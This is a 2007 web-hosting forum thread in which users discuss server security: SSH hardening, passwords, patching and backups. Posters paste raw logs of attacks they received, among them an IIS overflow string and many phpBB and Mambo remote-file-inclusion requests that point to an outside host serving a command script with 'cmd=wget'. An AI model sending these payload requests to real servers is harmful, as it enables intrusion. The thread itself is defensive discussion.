[Webhosting] Security

**Topcat** · 02-24-2007, 02:48 PM

Re: [Webhosting] Security

no point changing the port, any experienced intruder will find it. The key is not having soft passwords for ANYTHING accessible from the outside world.

**willawake** · 02-24-2007, 03:03 PM

Re: [Webhosting] Security

that is the whole point though. the majority of hack attempts are just kids using tools. if you like to serve multiple requests per second for ssh login then dont change it. of course yes if they scan all ports of your ip then they can find it but that is a more determined scan. the kids are just quickly looking for any ip with ssh that they can login via root with dictionary words. yes the passwords for everything should be secure and certainly not dictionary words.

the second type of easy hack is trying a specific exploit so they will look for an installation of an unsecure version of software whether wordpress, mambo, phbb etc and they have a tool which will detect the software version and apply the hack gaining them access to deface etc.

this leads webmasters to think they are being personally targeted. but that is not the case, their lack of attention to updates has attracted the attention.

here is an example of an opportunistic hack attempt

Code:

200.105.46.4 - - [03/Nov/2006:15:27:10 -0500] "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\

now that is an IIS exploit but the thing is that i am running apache under linux..........

**willawake** · 02-24-2007, 03:06 PM

Re: [Webhosting] Security

if anyone can explain wtf this stuff is...

Code:

64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/PNphpBB2/includes/functions_admin.phpfunctions_admin.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forum/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -

**willawake** · 02-24-2007, 03:11 PM

Re: [Webhosting] Security

of course if you are personally targeted by an experienced hacker because of the high profile of the site or the content, then it is likely that unless you are very careful about security then it is likely that you are fucked and are going to need some good backups which are stored in a location not controlled by the server. thankfully these are otherwise rare incidents.........

**gonzo0815** · 02-24-2007, 04:22 PM

Re: [Webhosting] Security

Someone is oviousely trying to get a console opend by this url, probably some systems are vulnerable to this url, but only a rough asumption.

**Topcat** · 02-24-2007, 04:30 PM

Re: [Webhosting] Security

Badcaps.net is fairly high profile, many attempts have been made.... I have the box locked down very nicely, hell only 5 ports are open.... Running on IIS, no major issues to report.... Apache on a win2k pro box is my favorite web server config tho...

**willawake** · 02-24-2007, 04:32 PM

Re: [Webhosting] Security

i think they are trying mambo and phbb exploits. both i am not running.

**Topcat** · 02-24-2007, 04:34 PM

Re: [Webhosting] Security

Originally posted by willawake

i think they are trying mambo and phbb exploits. both i am not running.

phpbb by itself is an exploit.... Yes, you can tell from the commands that it's phpbb.... wonders what vb ones are out there.... lol

**willawake** · 02-24-2007, 04:40 PM

Re: [Webhosting] Security

yes indeed. i was reading a while back a very sorry thread of many pages where a cheap host was apologising to his customers after one ran a not updated mambo and after exploit the entire server was fucked and also the offsite backups which the server controlled......were corrupted.......he was offering a good backup from a few months back.

**Topcat** · 02-24-2007, 04:46 PM

Re: [Webhosting] Security

The key to running a good web server:

Think of backups like religion, worship a new backup daily. No matter how well you think you have your box secured, there's always a new exploit that hasn't been discovered yet. No OS is flawless, and if you happen to end up as some script kiddie's lab rat, you won't lose much (if anything at all).

**willawake** · 02-24-2007, 04:48 PM

Re: [Webhosting] Security

yeah and in the beginning do a restore before you start to worship your backups

**Rainbow** · 02-24-2007, 05:06 PM

Re: [Webhosting] Security

I know how to secure my ssh daemon

Code:

Feb 18 02:53:05 router sshd[19094]: Did not receive identification string from 211.176.61.119
Feb 18 02:57:02 router sshd[19095]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:02 router sshd[19095]: Failed password for invalid user root from 211.176.61.119 port 43318 ssh2
Feb 18 02:57:06 router sshd[19097]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:07 router sshd[19097]: Failed password for invalid user root from 211.176.61.119 port 43763 ssh2
Feb 18 02:57:11 router sshd[19099]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:11 router sshd[19099]: Failed password for invalid user root from 211.176.61.119 port 44226 ssh2
Feb 18 02:57:16 router sshd[19101]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:16 router sshd[19101]: Failed password for invalid user root from 211.176.61.119 port 44674 ssh2
Feb 18 02:57:21 router sshd[19103]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:21 router sshd[19103]: Failed password for invalid user root from 211.176.61.119 port 45131 ssh2
Feb 18 02:57:26 router sshd[19105]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:26 router sshd[19105]: Failed password for invalid user root from 211.176.61.119 port 45568 ssh2
Feb 18 02:57:31 router sshd[19107]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:31 router sshd[19107]: Failed password for invalid user root from 211.176.61.119 port 46008 ssh2
Feb 18 02:57:35 router sshd[19109]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:36 router sshd[19109]: Failed password for invalid user root from 211.176.61.119 port 46463 ssh2
Feb 18 02:57:40 router sshd[19111]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:40 router sshd[19111]: Failed password for invalid user root from 211.176.61.119 port 46916 ssh2
Feb 18 02:57:45 router sshd[19113]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:45 router sshd[19113]: Failed password for invalid user root from 211.176.61.119 port 47371 ssh2
Feb 18 02:57:50 router sshd[19115]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:50 router sshd[19115]: Failed password for invalid user root from 211.176.61.119 port 47818 ssh2
Feb 18 02:57:55 router sshd[19117]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:57:55 router sshd[19117]: Failed password for invalid user root from 211.176.61.119 port 48277 ssh2
Feb 18 02:58:00 router sshd[19119]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:00 router sshd[19119]: Failed password for invalid user root from 211.176.61.119 port 48717 ssh2
Feb 18 02:58:04 router sshd[19121]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:05 router sshd[19121]: Failed password for invalid user root from 211.176.61.119 port 49174 ssh2
Feb 18 02:58:09 router sshd[19123]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:09 router sshd[19123]: Failed password for invalid user root from 211.176.61.119 port 49610 ssh2
Feb 18 02:58:14 router sshd[19125]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:14 router sshd[19125]: Failed password for invalid user root from 211.176.61.119 port 50052 ssh2
Feb 18 02:58:19 router sshd[19127]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:19 router sshd[19127]: Failed password for invalid user root from 211.176.61.119 port 50505 ssh2
Feb 18 02:58:24 router sshd[19129]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
Feb 18 02:58:24 router sshd[19129]: Failed password for invalid user root from 211.176.61.119 port 50958 ssh2
Feb 18 02:58:29 router sshd[19131]: User root from 211.176.61.119 not allowed because not listed in AllowUsers

**willawake** · 02-24-2007, 05:19 PM

Re: [Webhosting] Security

what is identification string? keys?

**Tom41** · 02-24-2007, 05:35 PM

Re: [Webhosting] Security

I have my web server locked down securely, I believe. The root password is unguessable (20 random characters, changed weekly) and I don't even have the telnetd, sshd or ftpd running! If I need to get something onto the web server, I have to go to the actual console and start up ftpd manually, remembering to stop it when I'm done. Or just burn the files I want to a CD-RW and put them on the server that way.

The only port on the server that's forwarded to the Internet is port 90 (for some reason, the ISP blocks incoming traffic to port 80 - perhaps to stop people getting into your router?).

Even so, I have had the server hacked twice. Without any ftpd or sshd running, and with a strong root password, I still got the web server's main page replaced with a hostile ActiveX control that would delete cmd.exe and command.com from any PC visiting (provided they were logged into an admin account). The second time was more of a script kiddy thing, a Javascript 'prank' that caused windows to bounce around the screen until you force terminated the browser.
How could it have been hacked? Exploit in Apache? Message board exploit giving you root shell access?

Also, I do see a lot of robots crawling my site and stopping when they see the robots.txt file

. I've also seen occasional requests for things like /thisfiledoesnotexist - perhaps to see if you have a custom 404 page?

**willawake** · 02-24-2007, 05:40 PM

Re: [Webhosting] Security

your isp blocks port 80 cos they dont want people serving?

what web apps are you running on that. something get exploit

[Webhosting] Security

[Webhosting] Security

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Related Topics